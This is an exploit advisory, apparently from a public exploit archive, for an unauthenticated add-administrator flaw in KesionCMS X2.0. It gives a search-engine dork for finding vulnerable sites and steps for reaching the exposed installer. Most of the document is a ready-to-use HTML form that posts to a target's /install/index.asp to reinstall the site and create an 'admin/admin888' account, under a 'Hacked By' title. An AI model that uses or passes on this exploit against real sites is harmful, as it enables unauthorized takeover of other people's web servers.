Kesion CMS X version 2.0 suffers from an unauthenticated add administrator vulnerability.
de0b37cd4485d86b801c27d7ced154e311d1fc425567511f3834306f7bec9321
====================================================================================================================================
| # Title : KesionCMS X2.0 Reinstall Add Admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) |
| # Vendor : https://www.kesion.com/ |
| # Dork : Powered by KesionCMS |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /install/index.asp
[+] http://127.0.0.1.com/install/?action=s4 = add your information to login
[+] copy & past this exploit listed below into a text file and save it with ".html" extension
[+] Exploit :
[+] @t Line 09 & 16 change the domain name of target
<head><title>
Hacked By indoushka
</title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />
<script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>
<script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>
<script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>
</head>
<body>
<form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">
<div class="guide">
<div class="guidetitle">
</div>
<div class="clear"></div>
</div>
<div class="clear"></div>
<input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5" />
<input type="hidden" name="DBlx" value="" />
<input type="hidden" name="CkbData" value="" />
<input type="hidden" name="TxtDBName_a" value="" />
<input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" />
<input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />
<input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />
<input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" />
<div id="http://www.tzxdcpv.com/install/?action=s4">
</div>
<div class="clear"></div>
<div class="sjlist">
<h5>网站参数配置</h5>
<ul>
<li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li>
<li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。
如http://www.kesion.com。
</li>
<li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。
系统会自动获取,建议不要修改。
</li>
<li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">
免费版本用户请留空或填“0”。
</li>
<li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li>
<li><span> 后台登录验证码:</span>
<input type="radio" name="isCode_a" value="True" /> 启用
<input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用
</li>
<li><span>管理认证码:</span>
<input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用
<font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>
</ul>
<div class="clear"></div>
<h5>填写管理员信息</h5>
<ul>
<li><span>管理员账号:</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>
<li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>
<li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>
</ul>
<div class="clear blank10"></div>
<div style="padding:5px">
<input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">
</div>
</div>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================